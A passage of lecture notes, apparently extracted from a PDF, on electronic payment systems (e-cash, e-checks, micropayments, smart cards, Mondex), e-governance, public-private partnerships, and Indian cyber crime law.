Security is of extreme importance while handling the online transactions Faith in the security of
the medium of exchange whether paper or digital is essential for the economy to function
E-cash is much secure than other online payment modes because in this case no credential such
as card-passwords or anything such is involved Its like simply the online fund transfer from
customerrsquos account to traderrsquos account
PREPARED BY ARUN PRATAP SINGH 25
25
However while accessing the customerrsquos account the customer must keep in mind the internet
security sweep or theft The online hacking and cracking can be avoided by using SSL and TSL
website security systems and keeping the website link with safe ldquoHttps ldquo protocols and proper
internet security softwares to keep aside the threats of malware evasdrooping and other security
threats
Advantages
We can transfer funds purchase stocks and offer a variety of other services without
having to handle physical cash or cheques
Electronic cash protects its user against theft With electronic cash the customer does
not need to provide financial information
E-cash supports small payments Other online payment system charge a fee for every
transaction no matter how much high or low it is but e-cash has a specific limit for
additional charges thatrsquos why very low payments are not charged a fee
Limitations
Maybe how much secure the e-cash payment system is but still no one is safe against
the online frauds In this case the trader is referred as fraudulent The trader may take
the amount but may not provide the services
While making the payment its very important that the internet connection and power
supply should be active If the payment is in process and internet supply fails in between
it can lead to loss of information ie amount will be charged but it wont reach to trader
and the refund takes very long time in general the refund time is at least 30-45 days
E-Cash is not for everyone Low income segments without computer and internet access
are unable to enjoy the usage of E-Cash
The rise of E-Cash is inevitable but further improvements are needed Tackling security
anonymity low income group readiness and technology reliability issues will make E-Cash more
perfect In countries such as India where people were hesitant to use such methods has shown
a tremendous use of online payments and E-cash payment system Slowly but steadily the growth
is seen and improving it technologically will make it more reliable and efficient for customers to
use it
PREPARED BY ARUN PRATAP SINGH 26
26
E-CHECK
What is an electronic check
Itrsquos simply an electronic version of a paper check When you convert a traditional check into an electronic payment you can process it through the Automated Clearing House (ACH) Network to save time and moneymdashand because electronic checks have more security features than a paper check they better protect your business and customers Another way to think of an electronic check is when a customer pays by entering in their bank account information online and electronically sending the money Electronic checks are becoming increasingly popular because they are so fast efficient and secure Electronic checks are sometimes called eChecks electronic check conversions or Back Office Conversions (BOCs) Read more on what you need to know as you consider using eChecks in your business
eCheck a new payment instrument combining the security speed and processing efficiencies of
all-electronic transactions with the familiar and well-developed legal infrastructure and business
processes associated with paper checks is the first and only electronic payment mechanism
chosen by the United States Treasury to make high-value payments over the public Internet
How electronic checks work
The process is simple First you run a customerrsquos paper check through an electronic scanner system supplied by your merchant service provider This virtual terminal captures the customers banking information and the payment amount The information is then transferred electronically over the Federal Reserve Banks ACH Network which takes the funds from your customers account and deposits them into yours After payment approval the virtual terminal will print a receipt for the customer to sign and keep Your employee should then void the paper check and return it to the customer Yoursquoll be able to view and report on your merchant transactions online although features may vary depending on your merchant service provider or your payment processing solution provider
How does the ACH Network work with eChecks
The ACH Network is a funds distribution system that moves funds electronically from one entity to another Itrsquos a highly reliable and efficient nationwide electronic network governed by the rules of the National Automated Clearing House Association (NACHA) and the Federal Reserve (Fed) Given its ability to electronically transfer money directly to and from bank accounts ACH is a faster payment method than traditional paper checks The ACH payment process is close to the paper check process only faster Clients give their bank routing or checking account number and after verification the payment is transferred quite immediately electronically through the ACH system Besides checks the ACH Network also handles debit card transactions direct deposits of payroll Social Security and other government benefits direct debit payments and business-to-business payments
PREPARED BY ARUN PRATAP SINGH 27
27
Reaping the benefits of eChecks
Converting your customersrsquo paper checks into electronic checks helps save time and reduces hassle for your staff because you can submit payments electronically instead of making trips to the bank However time saving and hassle reduction are not the only benefits Read on for more 1 Reduce processing costs by up to 60 eChecks require less manpower to process and donrsquot come with any deposit or transaction fees As a result processing an eCheck is generally much cheaper than processing a paper check or credit card transaction 2 Receive funds sooner Businesses that use electronic check conversion have their funds deposited almost twice as fast as those using traditional check processing Billing companies often receive payments within one day 3 Increase sales If your business doesnrsquot accept paper checks offering eChecks expands your customersrsquo options and can increase sales If yoursquore converting from paper checks to eChecks you can start accepting international and out-of-state checks while using account validation and customer authentication processes to protect your business from fraud 4 Work smarter and greener Electronic check conversion is easy to set up It relies on the trusted ACH Network And eChecks help reduce the more than 674 million gallons of fuel used and 36 million tons of greenhouse gas emissions created by transporting paper checks 5 Decrease errors and fraud eChecks reduce the potential for errors and fraud because fewer people handle them Merchant service providers also maintain monitor and check files against negative account databases that store information about individuals or companies that have records of fraud
Protecting your businessmdashand your customers
Electronic check conversion is one of the most secure payment methods in the electronic payment processing industry because it uses the latest information protection features 1 Authentication Merchants must verify that the person providing the checking account information has the authority to use that account Authentication services and products available to merchants include digital signatures and public key cryptography Also known as digital certificates digital signatures encrypt data in a way that gives the receiver a more reliable indication that the information was actually sent by the sender Theyrsquore used on the Internet to confirm the identity of a customer much as a handwritten signature would Because digital signatures are difficult to tamper with or imitate and are easily transportable theyrsquore a good way to verify identity Digital signatures are often used to implement electronic signatures which include any electronic data that carries the intent of a signature Public key cryptography is a security method that uses keys to encrypt and decrypt a sent message With electronic check conversion the private key is a secret mathematical calculation used to create the digital signature on the echeck and the public key is the key given to anyone
PREPARED BY ARUN PRATAP SINGH 28
28
who needs to verify that the sender signed the echeck and that the electronic transfer has not been tampered with 2 Duplicate detection Financial institutions use software and operational controls to prevent and detect duplication of the scanned electronic representations of customer checks 3 Encryption The ACH Network automatically encrypts messages using 128-bit encryption and a secure sockets layer (SSL) How to get started with electronic checks
Herersquos how to implement electronic check conversion as quickly and easily as possible 1 Choose a well-established processing company Good pricing is important but working with a reliable processor is essential 2 Notify your customers that your business will begin using electronic check conversion Federal laws require you to post a notification about this change and give your customers a takeaway copy You must also provide customers with a phone number to request more information 3 Look for a processor that makes it easy to align your current business processes with your new electronic processing system export customer data and integrate your new system with your business management software 4 QuickBooks Payments offers a complete payment processing solution Businesses can take payments from their customers in many ways- from ACH bank payments electronic checks to credit cards including Visa MasterCard Discover and American Express In addition to offering many ways to get paid QuickBooks Payments also enables businesses to email invoices to their customers with a Pay Now button Our data shows us that businesses using QuickBooks Payments are getting paid twice as fast due to the e-invoicing feature
This diagram illustrates how real-time electronic check processing works using the CyberSource Payment Service
1 Payer (customerbill payer) is prompted to authorize electronic debit enter bank routing number (ABA) and account number
PREPARED BY ARUN PRATAP SINGH 29
29
2 Merchants sales system securely transfers order information to CyberSource over the Internet
3 CyberSource forwards bank routing number and account number to processor 4 The routing number and account number are validated and the integrity of the accounts
checking history is verified Processor forwards approvedecline results to CyberSource 5 CyberSource returns approvaldecline message to merchant 6 If approved CyberSource routes check for settlement through a processer to the
Automated Clearinghouse System (ACH) Funds are deposited in approximately 1-3 business days
Four Different Scenarios of the FSTC E-check System ndash
PREPARED BY ARUN PRATAP SINGH 30
30
MICROPAYMENT METHODS
Traditional payment methods are called macropayment methods A new type of payment method known as micropayment method is emerging to cater for
very low value transactions Example
Millicent (pre-paymentcredit based) Paywords (post-payment)
PREPARED BY ARUN PRATAP SINGH 31
31
MICRO PAYMENT IS -
Very small payments made over the Web Transactions too small for credit cards Can be as little as a fraction of a cent Alternative to subscription and advertising Can go in either direction
A micropayment is an e-commerce transaction involving a very small sum of money in exchange
for something made available online such as an application download a service or Web-based
content
Micropayments are sometimes defined as anything less than 75 cents and can be as low as a
fraction of a cent A special type of system is required for such payments which are too small to
be feasible for processing through credit card companies
Heres one scheme for micropayment The user and seller each establish an account with a third-
party service provider who monitors collects and distributes micropayments The seller encodes
per-fee links inside a Web page When the user initiates a transaction payment goes through an
Internet wallet account managed by the service provider Micropayments accumulate until they
are collected as single larger payments Such a system is helpful when a user wants to make
PREPARED BY ARUN PRATAP SINGH 32
32
one-time micropayments to multiple sellers Seller-based accounts are more common for repeat
business with an individual enterprise
Once a common micropayment standard has been established some experts predict that
streaming media sites music and application downloads content vendors sports access sites
and other specialized resources will make pay-per-use common online
Advantages and risks ndash
With a micropayment system many small transactions are summarised over a defined period of
time and charged in one bill For that reason micropayments are applicable for businesses where
even small costs for every single transaction would be inefficient 4) The main benefits from the
customer site in using micropayment are speed and flexibility From the merchantsrsquo site speed
and acceptable transaction fees are very important As the transactions involve small capital
security does not have the highest priority Much more important than trust is security User and
merchants are more likely to use an insecure payment system from a trusted company than a
secure payment system from an untrusted (unknown) company Therefore the market entry
barriers for new providers are high Any company that wishes to enter this area must have plenty
of capital and be willing to invest a lot before return on investment as it is extremely difficult for
new payment systems to achieve widespread acceptance
Payment options ndash
Micropayment providers offer various payment modules Merchants need to sign up for an account with a chosen provider and decide for a module that suits their needs The customer gets an option (or options) how to pay for desired content or goods
The most common micropayment options are listed below 6) Call2pay Payment by telephone The customer is requested to call a toll number The fee is set on a per-call basis for the desired payment amount
Handypay Payment via mobile phone bill The customer enters his or her cell phone number and receives an SMS with a TAN in order to confirm payment
Ebank2pay Payment using online banking The customer transfers the payment amount his or her online banking access and a TAN After making payment the customer receives access to the purchased product
Credit card Payment per credit card The customer enters his credit card data and confirms the transaction The transactions can be optionally carried out with the 3-D Securetrade method (verified by VISAtrade and Mastercard SecureCodetrade)
Direct debit
PREPARED BY ARUN PRATAP SINGH 33
33
Payment by direct debit The customer enters his or her bank ID and account number and confirms the direct debit authorization
PayPal MicroPayments is a micropayment system that charges payments to
users PayPal account and allows transactions of less than US$12 to take place The service is
as of 2013 offered in select currencies only
Micropayment Uses ndash
Publishing
Marketing
Software
Entertainment
Web Services
SMART CARD
A smart card chip card or integrated circuit card (ICC) is any pocket-sized card with
embedded integrated circuits Smart cards are made of plastic generally polyvinyl chloride but
sometimes polyethylene terephthalate based polyesters acrylonitrile butadiene
styrene orpolycarbonate Since April 2009 a Japanese company has manufactured reusable
financial smart cards made from paper
Smart cards can provide identification authentication data storage and application
processing[2] Smart cards may provide strong security authentication for single sign-on (SSO)
within large organizations
A smart card is any pocket-sized card with embedded integrated circuits which can
process data
This implies that it can receive input which is processed and delivered as an output
What is Smart Card
Standard credit card-sized with microchip embedded on it
Two types
Memory-only chips
Microprocessor chips
Can hold up to 32000 bytes
Newer smart cards have math co-processors
PREPARED BY ARUN PRATAP SINGH 34
34
Perform complex encryption routines quickly
In 1968 German inventors patent combination of plastic cards with micro chips
Construction of Smart Cards ndash
PREPARED BY ARUN PRATAP SINGH 35
35
PREPARED BY ARUN PRATAP SINGH 36
36
Why Smart Cards ndash
Improve the convenience and security of any transaction
Provide tamper-proof storage of user and account identity
Provide vital components of system security
Protect against a full range of security threats
Advantages ndash
Flexibility
Security
Portability
Increasing data storage capacity
Reliability
Schematic overview of a smart card
PREPARED BY ARUN PRATAP SINGH 37
37
Smart card Processing
Smart Card Applications ndash
Ticketless travel
Seoul bus system 4M cards 1B transactions since 1996
Planned the SF Bay Area system
Authentication ID
Medical records
Ecash
Store loyalty programs
Personal profiles
Government
Licenses
Mall parking
Example Mondex
PREPARED BY ARUN PRATAP SINGH 38
38
OVERVIEW OF MONDEX
Mondex is a smart card electronic cash system which was originally developed by National
Westminster Bank in the United Kingdom and subsequently sold to MasterCard International
Mondex launched in a number of markets during the 1990s expanding from an original trial in
Swindon UK to Hong Kong Guelph and New York It was also trialled on several British
university campuses from the late 1990s including the University of Edinburgh University of
Exeter (between 1997 and 2001) University of York University of Nottingham Aston
University and Sheffield Hallam University
Direct transfer of electronic money between two cards
Transfer of electronic money over the Internet or telephone networks etc
Keep transaction records
Password protection and ldquolock cardrdquo functions
Portable balance finder to check balance
Support multiple currencies
PREPARED BY ARUN PRATAP SINGH 39
39
ADVANTAGES
CONSUMER ndash
Convenience
Accessibility
On chip record of recent transactions
Home load
Internet purchases
MERCHANT ndash
Reliable-Off line payment
Higher security
Low transaction cost
Reduced cash handling
FINANCIAL INSTITUTION ndash
Strengthen customer relationships
New financial and commercial partnerships
Mondex is a concept for an electronic payment system that provides an alternate to cash particularly small currency and coins (micro-payment) The concept was invented in 1990 by Tim Jones and Graham Higgins at National Westminster Bank (NatWest) in the UK
In July 1996 initiated by NatWest and Midland Bank PLC Mondex International Ltd was officially established by 17 major banks from North America AsiaPacific and Europe and was granted an exclusive licensing agreement with NatWest for the intellectual property rights to develop the Mondex concept technology and brand In the same year MasterCard International acquired 51 ownership of Mondex International and fully endorsed the Mondex technology architecture
How does Mondex Protect Privacy ndash
Principles protected
o Limits for collecting personal information
o limits for using disclosing and keeping personal information
o keeping personal information accurate
o safeguarding personal information
PREPARED BY ARUN PRATAP SINGH 40
40
Limits for collecting personal information
o loads from account
o deposits into account
o lost transactions
Limits for using disclosing and keeping personal information
o safeguard deposits
o to re-imburse for non-performance
Keeping personal information accurate
o load and unload are online
o rolling 10 transactions provides exact spend and retailer name
Safeguarding personal information
o firewalls in Multos - between applications - ITSEC 6 designation
o transaction data to retailer is deliberately limited
o individual transaction data is not collected by banks - Mondex is an unaudited
system
PREPARED BY ARUN PRATAP SINGH 41
41
The design of a Mondex smart card allows end users to transfer funds electronically onto the card
and then utilize the Mondex smart card to make purchases up to the total cash value held on the
card Mondex smart cards provide an electronicpayment system using all the capabilities
associated with smart card technology The Mondex smart card can be a convenient alternative
to cash
Although the design was five years old at the time the Mondex smart card was actually launched
in 1995 ndash two years before MasterCard assumed control of the technology
The banks that currently support the Mondex smart card include National Bank of Canada
Scotiabank Canada Trust Bank of Montreal Le Mouvement des caisses Desjardins and Toronto
Dominion Bank With so many respected lending institutions banking on the idea the Mondex
smart card is worth a closer look
The Mondex smart card has the ability to make card-to-card transfers which is not possible with
standard credit or debit cards When you use a creditdebit card to make a purchase
communication is required between the bank and your card However Mondex cards contain an
embedded microprocessor with sophisticated encryption methods and tamper-proof hardware
designed to protect them from hackers The ability of the Mondex smart card to do offline
transactions means they are less dependent on expensive network infrastructure reducing
transaction costs Offline transactions may seem anonymous however they actually are recorded
in the digital memory of the cardrsquos microprocessor and remain retrievable the next time the card
is used at an ATM or as soon as the retailer uploads transaction data to the bank computer
A significant disadvantage with Mondex is that transactions arenrsquot truly anonymous Unlike pre-
paid phone cards which are also based on smart card technology you canrsquot purchase a Mondex
card without revealing your identity Each card has a unique identification number through which
owners can easily be identified Mondex smart cards have not been as successful as originally
predicted Customers have not been especially satisfied with the card and its services Unlike a
credit or debit card your money may be lost forever if you should lose a Mondex smart card
Losing a Mondex card is just like losing a wallet full of cash With a credit card yoursquore protected
against any loss exceeding $50 dollars This protection is not currently available with a Mondex
smart card
According to the Mondex smart card system it is fully auditable There is a log of the time date
amount and participants of each transaction which hampers the privacy of users Technically
however Mondex canrsquot claim to be a fully auditable system After a number of transactions
overflow can occur as a result of limited memory in the Mondex smart-cards This means that
PREPARED BY ARUN PRATAP SINGH 42
42
significant data may be lost before Mondex is able to retrieve it Critics say this loss of data is a
critical design flaw making it difficult for Mondex to reliably detect fraud
While Mondex smart cards are not a hundred percent secure they do possess the ability to tolerate
minor fraud loss
Mondex believes their electronic payment system is secure They are convinced that critics who
have voice concern over security issues are mistaken and misinformed Perhaps the use of a
Mondex smart card depends on a personal level of trust
E-GOVERNANCE
Although the term lsquoe-Governancersquo has gained currency in recent years there is no standard
definition of this term Different governments and organizations define this term to suit their own
aims and objectives Sometimes the term lsquoe-governmentrsquo is also used instead of lsquoe-
Governancersquo
Several dimensions and factors influence the definition of e-governance or electronic
governance The word ldquoelectronicrdquo in the term e-governance implies technology driven
governance E-governance is the application of information and communication technology (ICT)
for delivering government services exchange of information communication transactions
integration of various stand-alone systems and services between government-to-customer (G2C)
government-to-business (G2B) government-to-government (G2G) as well as back office
processes and interactions within the entire government framework Through e-governance
government services will be made available to citizens in a convenient efficient and transparent
manner The three main target groups that can be distinguished in governance concepts are
government citizens and businessesinterest groups In e-governance there are no distinct
boundaries
Generally four basic models are available ndash government-to-citizen (customer) government-to-
employees government-to-government andgovernment-to-business
Difference between E-Government and E-Governance ndash
Both the terms are treated to be the same however there is some difference between the two
E-government is the use of the ICTs in public administration - combined with organizational
change and new skills - to improve public services and democratic processes and to strengthen
support to public The problem in this definition to be congruence definition of e-governance is
that there is no provision for governance of ICTs As a matter of fact the governance of ICTs
requires most probably a substantial increase in regulation and policy-making capabilities with
all the expertise and opinion-shaping processes among the various social stakeholders of these
PREPARED BY ARUN PRATAP SINGH 43
43
concerns So the perspective of the e-governance is the use of the technologies that both help
governing and have to be governed The Public-Private Partnership (PPP) based e-governance
projects are hugely successful in India United Telecoms Limited known as UTL is a major player
in India on PPP based e-governance projects Each project had mammoth state wide area
networks in these states
E-governance is the future many countries are looking forward to for a corruption-free
government E-government is one-way communication protocol whereas e-governance is two-
way communication protocol The essence of e-governance is to reach the beneficiary and ensure
that the services intended to reach the desired individual has been met with There should be an
auto-response to support the essence of e-governance whereby the Government realizes the
efficacy of its governance E-governance is by the governed for the governed and of the
governed
Establishing the identity of the end beneficiary is a challenge in all citizen-centric services
Statistical information published by governments and world bodies does not always reveal the
facts The best form of e-governance cuts down on unwanted interference of too many layers
while delivering governmental services It depends on good infrastructural setup with the support
of local processes and parameters for governments to reach their citizens or end
beneficiaries Budget for planning development and growth can be derived from well laid out e-
governance systems
Why e-Governance
E-Government can transform citizen service provide access to information to empower citizens
enable their participation in government and enhance citizen economic and social opportunities
so that they can make better lives for themselves and for the next generation
BASIC ARCHITECTURE
PREPARED BY ARUN PRATAP SINGH 44
44
A suggested architecture for e-Governance is shown in the diagram where it is illustrated that
Applications from various departments can be integrated together so as to be accessed by any
terminal or computer from any other department or anywhere through the network This is
because of the characteristics of CORBA - it is location transparent language independent
implementation independent architecture and Operating System independent The applications
connected through CORBAIIOP could be legacy applications wrapped around to suit CORBA
specifications or any new Web application or could be even a data base environment using
Oracle etc Seamless interconnection and thereby effective utility of the entire system of e-
Governance is possible if the middleware is designed to have the necessary services like
Transactions Data Base Management Messaging and Naming
Regarding security aspects CORBA Security standard is built around existing security
specifications such as Distributed Computing Environment (DCE) the Kerberos Protocol and
Generic Security Service (GSS) API While these technologies are heavily weighted Public Key
Security with Secured Socket Layer (SSL) is popular with Internet based transactions
Types of Interactions in e-Governance
e-Governance facilitates interaction between different stake holders in governance These interactions may be described as follows
G2G (Government to Government)
In this case Information and Communications Technology is used not only to restructure the governmental processes involved in the functioning of government entities but also to increase the flow of information and services within and between different entities This kind of interaction is only within the sphere of government and can be both horizontal ie between different government agencies as well as between different functional areas within an organization or vertical ie between national provincial and local government agencies as well as between different levels within an organization The primary objective is to increase efficiency performance and output
PREPARED BY ARUN PRATAP SINGH 45
45
G2C (Government to Citizens)
In this case an interface is created between the government and citizens which enables the citizens to benefit from efficient delivery of a large range of public services This expands the availability and accessibility of public services on the one hand and improves the quality of services on the other It gives citizens the choice of when to interact with the government (eg 24 hours a day 7 days a week) from where to interact with the government (eg service centre unattended kiosk or from onersquos homeworkplace) and how to interact with the government (eg through internet fax telephone email face-to-face etc) The primary purpose is to make government citizen-friendly
G2B (Government to Business)
Here e-Governance tools are used to aid the business community ndash providers of goods and services ndash to seamlessly interact with the government The objective is to cut red tape save time reduce operational costs and to create a more transparent business environment when dealing with the government The G2Binitiatives can be transactional such as in licensing permits procurement and revenue collection They can also be promotional and facilitative such as in trade tourism and investment These measures help to provide a congenial environment to businesses to enable them to perform more efficiently
G2E (Government to Employees) Government is by far the biggest employer and like any organization it has to interact with
its employees on a regular basis This interaction is a two-way process between the
organization and the employee Use of ICT tools helps in making these interactions fast
and efficient on the one hand and increase satisfaction levels of employees on the other
Difference between G2B and B2G
Government to business (G2B)- Refers to the conducting of transactions between
government bodies and business via internet
Business to government (B2G)- Professional affairs conducted between companies and
regional municipal or federal governing bodies B2G typically encompasses the
determination and evaluation of proposal and completion of contract
PUBLIC PRIVATE PARTNERSHIPS
bull Agreement between Government and the Private Sector for the Provision of a Public
Good or Service by the Latter
bull Generally but not always involving
ndash Long Term Contracts
ndash User Charges andor Payments flowing between the Parties
ndash Shared Investments but Mainly Private
PREPARED BY ARUN PRATAP SINGH 46
46
ndash Risk Sharing by the Parties
bull Must be a Partnership
A public-private partnership exists when public sector agencies (federal state or local) join with
private sector entities (companies foundations academic institutions or citizens) and enter into a
business relationship to attain a commonly shared goal that also achieves objectives of the
individual partners
Why do them
bull Fiscal Head Room
bull As a Way of Financing the Project
bull Separate Policy amp Regulation from Operations
PREPARED BY ARUN PRATAP SINGH 47
47
bull Make the Good or Service Available
bull Pay for Performance and Output
bull Introduce Competition ndash For and In the Market
PREPARED BY ARUN PRATAP SINGH 48
48
The Need to Set the Right Priorities ndash
Four Basic Dimensions of P3
Although each is unique all P3rsquos include four basic characteristics
Shared goals
Shared resources (time money expertise people)
Shared risks
Shared benefits
Benefits
Expedited project completion
Project cost savings
Improved quality
Use of private resources
Access to new sources of private capital
Two Major Steps
PREPARED BY ARUN PRATAP SINGH 49
49
Crafting the Partnership
Implementing the Partnership
Project Management -
Six Distinct Phases
Genesis
Whatrsquos the need
Whatrsquos driving the need rationale
Facility non-compliance natural disaster budget deficit
Is there a need for a PublicPrivate Partnership
PREPARED BY ARUN PRATAP SINGH 50
50
Preliminary Project Definition
Feasibility
Is a PublicPrivate Partnership feasible not only financially but practically Can it be
done
Market Research
EconomicFinancial Analysis
Program Budget and Schedule
Risk Analysis
Plan and Test
Final project definition
What is the best way to complete the project
Has the plan been thoroughly tested to assess market demand public and stakeholder
feedback and economics
Master ScheduleBudget
Political Climate
Any potential ldquofatal flawsrdquo that could derail the project
Procurement and Contracting
How do you choose and contract with the best-value private partner
Whatrsquos the best delivery method
Design-Bid-Build
Design-Build
Finance-Design-Build
What do current statutes allow
Procurement Approach
Sole Source RFP Low Bid
Risk Allocation between Public and private Partners
Structuring of ContractRisks and Rewards
PREPARED BY ARUN PRATAP SINGH 51
51
Implement
Environmental
Design
Permitting
Construction
Commissioning and Administration
Operate
Startup
Monitoring
Assessment
Enhancement
Contract Modifications
Contract Renegotiations
READINESS IN E-GOVERNANCE
A high level of readiness to develop and implement e-government services is a prerequisite for a high--performing and innovative public sector that delivers integrated services making life easier for citizens and businesses E-government readiness is therefore a -significant indicator of whether a country is prepared to harvest efficiencies gained from ICT-enabled public administrations
The UNs e-government readiness index is a combined indicator of the supply of potential demand for and maturity of e-government services OECD member countries exhibit a high capacity to develop and implement e-government services This is generally characterized by an extensive broadband infrastructure a repository of electronic information on government laws and policies including links to archived information and downloadable forms and a high level of comfort with ICT by citizens and businesses Countries with the highest readiness index tend to also have a large amount of transactional and e-commerce features on their government websites As noted by the UN in its 2008 e-government survey the Scandinavian countries with the top three scores on the readiness index all generally share similar e-government environments (eg the accessibility and penetration of the electronic infrastructure) and strategies (eg the online provision of services) Each country has two main government websites one that is informative and another that is a gateway for e-government services In addition citizens and businesses are able to access many services and complete many transactions online However similar levels of e-government readiness can also result from different strategic approaches
Internet access is a prerequisite for citizens and businesses to use e-government services and thus a leading indicator of countries readiness to harness the potential efficiencies of ICT Broadband penetration has increased dramatically in most OECD member countries in the past
PREPARED BY ARUN PRATAP SINGH 52
52
five years as countries have made significant investments in their telecommunications infrastructure
SECURITY ISSUES IN E-GOVERNANCE
1 INTRODUCTION The term e-Government is defined by the Organization for Economic Cooperation and Development (OECD) as the use of new information and communication technologies (ICTs) by governments as applied to the full range of government functions In particular the networking potential offered by the Internet and related technologies have the potential to transform the structures and operation of government
The effective management of information security is a key factor as willingness of the different users (citizens and other parties) to use e-Government services will heavily depend on the trust they have on the data security of this service
2 INFORMATION SECURITY A central challenge of e-Government service is how the new technology can be used not only to increase efficiency for public administration but also to strengthen confidence in privacy measures by creating mutual transparency between public administration and citizens
The process approach for information security management system ISMS encourages its users to emphasize the importance of
understanding an organizationrsquos information security requirements and the need to establish policy and objectives for information security
implementing and operating controls to manage an organizations information security risks in the context of the organizationrsquos overall business risks
monitoring and reviewing the performance and effectiveness of the ISMS continual improvement based on objective measurement
Data security requires a set of security requirements Authentication capability to identify who is using the services (person or software program) Processes of verifying that you are who you say you are Authorization capability to give rights access to resources Process to verify someone have the rights to do what she is trying to do Confidentiality capability to prevent unauthorized access to information Integrity capability to prevent information from unauthorized modification and ensuring that information can be relied upon and is accurate and complete Traceability capability to chronologically interrelate any transaction to a person or system that performed the action in a way that is verifiable Non-repudiation capability to prevent the intervening person or system in an event or action to denying or challenging their participation on the event
Example of organizational and technical measures to prevent unauthorized access and processing are shown
Protecting premises equipment and systems software including input-output units
PREPARED BY ARUN PRATAP SINGH 53
53
Protecting software applications used to process personal data Preventing unauthorized access to personal data during transmission thereof including
transmission via telecommunication means and networks Ensuring effective methods of blocking destruction erasure or anonymization of
personal data Enabling subsequent determination of when individual personal data were entered into a
filing system used or otherwise processed and the person responsible for the period covered by statutory protection of the rights of an individual with regard to unauthorized supply or processing of personal data
Despite trusted security and privacy measures constitutes a crucial success factor for e-Government that has not been yet addressed as UN 2012 Survey shows only 20 of national portals clearly indicate the presence of security features Europe is leading with 44 countries displaying secure links on their national websites but survey do not consider regional and local websites and neither the many decentralized public organization web portals
3 INFORMATION SECURITY THREATS Services provided by e-Government to citizens enterprise public officer government administration and agencies via Internet and mobile connections are vulnerable to a variety of threats Detailed examples of cyber attacks using techniques like packet sniffer probe malware internet infrastructure attack denial of services attack remote to local attack and user to root attack The successful adoption of an ISMS is important to protect information assets allowing an organization to
Achieve greater assurance that its information assets are adequately protected against information security risks on a continual basis
Maintain a structured and comprehensive framework for identifying and assessing information security risks selecting and applying applicable controls and measuring and improving their effectiveness
Continually improve its control environment Effectively achieve legal and regulatory compliance
There are simple and well-known web application vulnerabilities that could be avoided but e- Government webs are still vulnerable A research work found 816 e-Government web sites from 212 different countries were vulnerable to Cross Site Scripting (XSS) and Structured Query Language (SQL) injection SQL injection attack can compromise data integrity while XSS is a vulnerability which attackers may exploit to steal users information
Specific security measures like firewalls intrusion detection software encryption and secure networks must be defined designed and implemented for government agencies to provide the appropriate levels of security But information security must also take into consideration the people and processes that rely on the systems Employees with daily access to e-Government systems must be trained on cybersecurity and this aspect must become part of their job A study by the Department of Computer Science at Columbia University shows how the human factor influences cybersecurity policies and how that work could be used to train government employees to improve the security posture of government departments and agencies
PREPARED BY ARUN PRATAP SINGH 54
54
CYBER CRIME AND LAWS
The expression lsquoCrimersquo is defined as an act which subjects the doer to legal punishment
or any offence against morality social order or any unjust or shameful act The ldquoOffence
is defined in the Code of Criminal Procedure to mean as an act or omission made
punishable by any law for the time being in force
Cyber Crime is emerging as a serious threat World wide governments police
departments and intelligence units have started to react
Cyber Crime is a term used to broadly describe criminal activity in which computers or
computer networks are a tool a target or a place of criminal activity and include everything
from electronic cracking to denial of service attacks It is also used to include traditional
crimes in which computers or networks are used to enable the illicit activity
Computer crime mainly consists of unauthorized access to computer systems data
alteration data destruction theft of intellectual property Cyber crime in the context of
national security may involve hacking traditional espionage or information warfare and
related activities
Pornography Threatening Email Assuming someones Identity Sexual Harassment
Defamation Spam and Phishing are some examples where computers are used to commit
crime whereas Viruses Worms and Industrial Espionage Software Piracy and Hacking
are examples where computers become target of crime
Cyber Crime Variants
Hacking
Hacking is a crime which entails cracking systems and gaining unauthorized access to the data
stored in them Hacking had witnessed a 37 per cent increase this year
Cyber Squatting
Cyber Squatting is the act of registering a famous Domain Name and then selling it for a fortune
This is an issue that has not been tackled in IT ACT 2000
Phishing is just one of the many frauds on the Internet trying to fool people into parting with their
money Phishing refers to the receipt of unsolicited emails by customers of Financial Institutions
requesting them to enter their Username Password or other personal information to access their
Account for some reason
The fraudster then has access to the customers online bank account and to the funds contained
in that account
Cyber Stalking is use of the Internet or other electronic means to stalk someone This term is
used interchangeably with online harassment and online abuse Stalking generally involves
harassing or threatening behaviour that an individual engages in repeatedly such as following a
person appearing at a persons home or place of business making harassing phone calls leaving
written messages or objects or vandalizing a persons property
PREPARED BY ARUN PRATAP SINGH 55
55
Vishing is the criminal practice of using social engineering and Voice over IP (VoIP) to gain access
to private personal and financial information from the public for the purpose of financial reward
The term is a combination of ldquoVoice and phishing Vishing exploits the publics trust in landline
telephone services
Vishing is typically used to steal credit card numbers or other information used in identity theft
schemes from individuals
A rapidly growing online user base
121 Million Internet Users
65 Million Active Internet Users up by 28 from 51 million in 2010
50 Million users shop online on Ecommerce and Online Shopping Sites
46+ Million Social Network Users
346 million mobile users had subscribed to Data Packages
PREPARED BY ARUN PRATAP SINGH 56
56
CYBER LAW
(1) Whoever with the Intent to cause or knowing that he is likely to cause Wrongful Loss or
Damage to the public or any person Destroys or Deletes or Alters any Information
Residing in a Computer Resource or diminishes its value or utility or affects it injuriously
by any means commits hack
(2) Whoever commits hacking shall be punished with imprisonment up to three years or with
fine which may extend up to two lakh rupees or with both
Whoever without permission of the owner of the computer
Secures Access
Downloads Copies or extracts any data computer database or any
information
Introduce or causes to be introduce any Virus or Contaminant
Disrupts or causes disruption
Denies or causes denial of access to any person
Provides any assistance to any person to facilitate access
Charges the services availed of by a person to the account of
another person by Tampering with or Manipulating any Computer
Computer System or Computer Network
Shall be liable to pay damages by way of compensation not exceeding one crore rupees
to the person so affected
Section ndash 43
Destroys Deletes or Alters any Information residing in a computer resource or diminishes its
value or utility or affects it injuriously by any means
Steals conceals destroys or alters or causes any person to steal conceal destroy or alter any
computer source code used for a computer resource with an intention to cause damage
ldquoIf any person dishonestly or fraudulently does any act referred to in section 43 he shall be
punishable with imprisonment for a term which may extend to two three years or with fine which
may extend to five lakh rupees or with bothrdquo [S66]
S66A - Punishment for sending offensive messages through communication service etc
Any person who sends by means of a computer resource or a communication device
Any information that is grossly offensive or has menacing character or
PREPARED BY ARUN PRATAP SINGH 57
57
Any information which he knows to be false but for the purpose of causing annoyance
inconvenience danger obstruction insult injury criminal intimidation enmity hatred or
ill will persistently makes by making use of such computer resource or a communication
device
Any electronic mail or electronic mail message for the purpose of causing annoyance or
inconvenience or to deceive or to mislead the addressee or recipient about the origin of
such messages
Shall be punishable with imprisonment for a term which may extend to three years and with
fine
S 66C - Punishment for identity theft
ldquoWhoever fraudulently or dishonestly make use of the electronic signature password or
any other unique identification feature of any other person shall be punished with imprisonment
of either description for a term which may extend to three years and shall also be liable to fine
which may extend to rupees one lakhrdquo
S 66D - Punishment for cheating by personation by using computer resource
